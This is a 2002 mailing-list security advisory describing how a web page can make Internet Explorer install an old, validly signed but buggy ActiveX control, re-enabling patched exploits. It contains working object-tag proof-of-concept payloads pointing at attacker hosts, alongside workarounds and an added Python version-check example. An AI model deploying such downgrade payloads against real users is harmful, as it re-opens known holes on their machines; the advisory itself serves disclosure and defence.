Digitally signing buggy components (Version 2.0)

From: Georgi Guninski (guninski@GUNINSKI.COM)
Date: 05/06/02


Date:         Mon, 6 May 2002 17:25:26 +0300
From: Georgi Guninski <guninski@GUNINSKI.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Digitally signing buggy components (Version 2.0)

Date: 14 February 2002
Updated: 6 May 2002 (Updated Proof of Concept)

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:

ActiveX in Internet Explorer allows downloading signed components (native code)
from the web and installing them on the user's computer.

As history shows, a lot of ActiveX components are buggy, and a new version gets
released. The interesting part is that the buggy version is still validly signed
and remains available in one form or another: the signature proves who produced
the code, not that it is the current, patched build.

A purely hypothetical scenario is to try to install the old buggy signed version,
either if the user doesn't have the control at all or on top of the patched one.
Basically this is done this way (the classid need not be the control's real CLSID:
a CLSID that is not registered on the machine makes IE treat the control as missing
and fetch the codebase, and installing the DLL registers the control under its real
CLSID again):
--------------------
[object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted"]
[/object]
--------------------

Proof of concept:

So it turned out to be exploitable on my poor Windows box.

Ingredients needed:
You need outlctl.dll version 10.0.2616.0 (signed by Microsoft).
It is distributed with the original (not patched) Office XP, so you may get
it from a *clean* install of Office XP.
For some reason I still keep it.
Microsoft distributed the same buggy control in a CAB on their site, but
(un)fortunately it is no longer available there; the CDs still have it.
Place outlctl.dll on an accessible web server, say http://msux/outlctl.dll.
Place the following in an HTML file ("<" and ">" changed to "[" and "]" to avoid spam):
-------------------------
[object id="o1" codebase='http://msux/outlctl.dll'
    classid="clsid:11111111-1111-1111-1111-111111111112"
]
[param name="folder" value="Inbox"]
[/object]
--------------------------
The expected result is to see a box saying
"do you want to install some warez? They are really signed by Microsoft and
according to the dialog VeriSign can confirm they are signed by them"
(the buggy warez really is signed by Microsoft), and nothing more.
If the user chooses "yes" or has chosen to always trust warez signed by Microsoft,
then http://www.guninski.com/vv2xp.html starts working again.

So, I wonder whether doing such mischief may lead to old exploits starting
to work again?
(Updated: now I know it does.)

Workaround/Solution:
Anyway, to prevent such stuff, in Internet Explorer's security options
disable everything that contains "active".
Or at least, if you see a prompt "...This is digitally signed by X...",
think about whether you really trust X, keeping in mind their security record.
Reapply the Microsoft patch after trying the demo.
Don't ever choose "Always trust them".
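As an added example (not part of the original advisory, and not Microsoft's or
Internet Explorer's own logic): a Python check that models the decision the
install prompt should have made, assuming the Authenticode verification result
is passed in from elsewhere. It reads the FileVersion out of a DLL's
VS_FIXEDFILEINFO block and refuses any build not newer than the outlctl.dll
10.0.2616.0 named above, no matter how valid the signature is. The
KNOWN_VULNERABLE table and the fake_pe_with_version sample bytes are constructed
for this example; the signature-scanning shortcut in extract_file_version is an
assumption that suffices for a quick audit, not a full PE resource walk.

```python
import struct
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int, int]

# dwSignature that opens every VS_FIXEDFILEINFO structure in a PE version
# resource; the four fields that follow hold the file version.
VS_FFI_SIGNATURE = 0xFEEF04BD

# Highest build of each control known to carry the bug. Anything not newer
# than the entry is treated as vulnerable, whether or not it is signed.
# outlctl.dll 10.0.2616.0 is the build named in the advisory; the table
# itself is constructed for this example.
KNOWN_VULNERABLE: Dict[str, Version] = {
    "outlctl.dll": (10, 0, 2616, 0),
}


def extract_file_version(pe_bytes: bytes) -> Optional[Version]:
    """Return the FileVersion from the first VS_FIXEDFILEINFO found.

    Scans for the 0xFEEF04BD signature instead of walking the resource
    directory (assumed shortcut: good enough for auditing a downloaded DLL,
    but a hostile file could plant a decoy signature earlier in the image).
    """
    needle = struct.pack("<I", VS_FFI_SIGNATURE)
    off = pe_bytes.find(needle)
    if off < 0 or off + 16 > len(pe_bytes):
        return None
    # dwSignature, dwStrucVersion, dwFileVersionMS, dwFileVersionLS
    _, _, ms, ls = struct.unpack_from("<IIII", pe_bytes, off)
    return (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)


def is_known_vulnerable(name: str, version: Version) -> bool:
    """True if this build is at or below the newest known-bad build."""
    worst = KNOWN_VULNERABLE.get(name.lower())
    return worst is not None and version <= worst


def should_install(name: str, pe_bytes: bytes,
                   signature_valid: bool) -> Tuple[bool, str]:
    """Decide whether a downloaded control may be installed.

    signature_valid stands in for the Authenticode check (assumed to be
    done by the caller). A valid signature is necessary but never
    sufficient: the version must also be newer than every known-bad build.
    """
    if not signature_valid:
        return False, "signature invalid"
    version = extract_file_version(pe_bytes)
    if version is None:
        return False, "no version resource"
    if is_known_vulnerable(name, version):
        return False, "signed but known-vulnerable build %d.%d.%d.%d" % version
    return True, "ok"


def fake_pe_with_version(version: Version) -> bytes:
    """Constructed sample: a byte blob carrying a VS_FIXEDFILEINFO header.

    Not a real PE image, just enough bytes for extract_file_version to
    parse, so the check can be exercised offline.
    """
    ms = (version[0] << 16) | version[1]
    ls = (version[2] << 16) | version[3]
    fixed = struct.pack("<IIII", VS_FFI_SIGNATURE, 0x00010000, ms, ls)
    return b"MZ" + b"\x00" * 60 + fixed + b"\x00" * 40


if __name__ == "__main__":
    # The advisory's scenario: the old build, correctly signed.
    old = fake_pe_with_version((10, 0, 2616, 0))
    print(should_install("outlctl.dll", old, signature_valid=True))
    # A newer build, correctly signed.
    newer = fake_pe_with_version((10, 0, 2627, 0))
    print(should_install("outlctl.dll", newer, signature_valid=True))
```

On a real Windows box the same two facts come from
`Get-AuthenticodeSignature .\outlctl.dll` and
`(Get-Item .\outlctl.dll).VersionInfo.FileVersion`; the point of the check is
that the second must be consulted as well as the first, because a signature
cannot be "un-signed" when a build turns out to be buggy.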

Regards,
Georgi Guninski
http://www.guninski.com
